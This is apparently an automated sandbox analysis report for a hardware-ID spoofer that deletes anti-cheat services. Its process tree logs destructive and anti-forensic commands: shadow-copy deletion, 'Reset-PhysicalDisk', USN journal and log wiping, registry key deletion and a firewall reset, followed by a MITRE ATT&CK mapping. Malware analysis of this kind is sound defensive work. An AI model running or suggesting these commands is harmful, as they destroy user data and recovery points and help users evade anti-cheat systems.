- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1628
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {1019924949-1903120013-1847418153} /f
    3⤵
    - Modifies registry key
    PID:484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:308
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {1019924949-1903120013-1847418153} /f
    3⤵
    - Modifies registry key
    PID:568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\USBHUB3\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\USBHUB3\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {1019924949-1903120013-1847418153} /f
    3⤵
    - Modifies registry key
    PID:472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\USBXHCI\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:704
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\USBXHCI\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {1019924949-1903120013-1847418153} /f
    3⤵
    - Modifies registry key
    PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:1344
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:2976
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:2596
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:560
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    - Modifies registry key
    PID:576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:1708
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:2972
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    - Modifies registry key
    PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:2952
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:1280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    - Modifies registry key
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:108
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    - Modifies registry key
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:2608
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:2348
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe C: 1C78-D409
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe D: 4BFE-3B9D
  2⤵
  PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe E: CB76-B572
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Disk1.exe F: 6C12-9E22
  2⤵
  PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /SU AUTO >nul
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /SS %random%%random%-%random%%random%-%random%%random% >nul
  2⤵
  PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /BS %random%%random%-%random%%random%-%random%%random% >nul
  2⤵
  PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /CS %random%%random%-%random%%random%-%random%%random% >nul
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Solution.exe /PSN %random%%random%-%random%%random%-%random%%random% >nul
  2⤵
  PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop winmgmt >nul
  2⤵
  PID:2032
- - C:\Windows\system32\sc.exe
    sc stop winmgmt
    3⤵
    - Launches sc.exe
    PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start winmgmt >nul
  2⤵
  PID:828
- - C:\Windows\system32\sc.exe
    sc start winmgmt
    3⤵
    - Launches sc.exe
    PID:888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop winmgmt /y >nul
  2⤵
  PID:1076
- - C:\Windows\system32\net.exe
    net stop winmgmt /y
    3⤵
    PID:2192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop winmgmt /y
      4⤵
      PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
  2⤵
  PID:2316
- - C:\Windows\system32\net.exe
    net start winmgmt /y
    3⤵
    PID:1692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start winmgmt /y
      4⤵
      PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
  2⤵
  PID:1516
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ip reset >nul
  2⤵
  PID:1504
- - C:\Windows\system32\netsh.exe
    netsh int ip reset
    3⤵
    PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int reset all >nul
  2⤵
  PID:976
- - C:\Windows\system32\netsh.exe
    netsh int reset all
    3⤵
    PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
  2⤵
  PID:1764
- - C:\Windows\system32\netsh.exe
    netsh int ipv4 reset
    3⤵
    PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
  2⤵
  PID:3060
- - C:\Windows\system32\netsh.exe
    netsh int ipv6 reset
    3⤵
    PID:548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
  2⤵
  PID:2988
- - C:\Windows\system32\netsh.exe
    netsh winsock reset
    3⤵
    PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall reset >nul
  2⤵
  PID:1524
- - C:\Windows\system32\netsh.exe
    netsh advfirewall reset
    3⤵
    - Modifies Windows Firewall
    PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh winsock reset catalog >nul
  2⤵
  PID:2088
- - C:\Windows\system32\netsh.exe
    netsh winsock reset catalog
    3⤵
    PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
  2⤵
  PID:2776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
  2⤵
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
  2⤵
  PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
  2⤵
  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
  2⤵
  PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
  2⤵
  PID:2528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:2380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:2632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
  2⤵
  PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
  2⤵
  PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
  2⤵
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
  2⤵
  PID:1252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell vssadmin delete shadows /all
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
- C:\Windows\system32\vssadmin.exe
  "C:\Windows\system32\vssadmin.exe" delete shadows /all
  2⤵
  - Interacts with shadow copies
  PID:2104

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Reset-PhysicalDisk *
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8d413e7e65f1527186c54b92264a8cea

SHA1
99acd18f2577e1746799e678f6e7743ec549ba2f

SHA256
84f8e472267d122d2eadaed67d95fbf2a7c29a89369680b2555c4edcb0fc29ca

SHA512
9eb0a3504f6255374023dc251ffbf2ecac7e7244b04cd7121ae5d17c950c34238f540519af4d67d163653cea5a257a22e5acf98ce1f2f00b68a41e9cf1be6926

Download Submit
memory/880-12-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download
memory/880-5-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/880-7-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/880-8-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download
memory/880-11-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/880-10-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/880-9-0x00000000024A0000-0x0000000002520000-memory.dmp

Filesize
512KB

Download
memory/880-4-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/880-6-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-21-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2824-20-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-19-0x0000000001D60000-0x0000000001D68000-memory.dmp

Filesize
32KB

Download
memory/2824-22-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

Filesize
9.6MB

Download
memory/2824-18-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/2824-23-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2824-25-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2824-24-0x00000000026A0000-0x0000000002720000-memory.dmp

Filesize
512KB

Download
memory/2824-26-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

Filesize
9.6MB

Download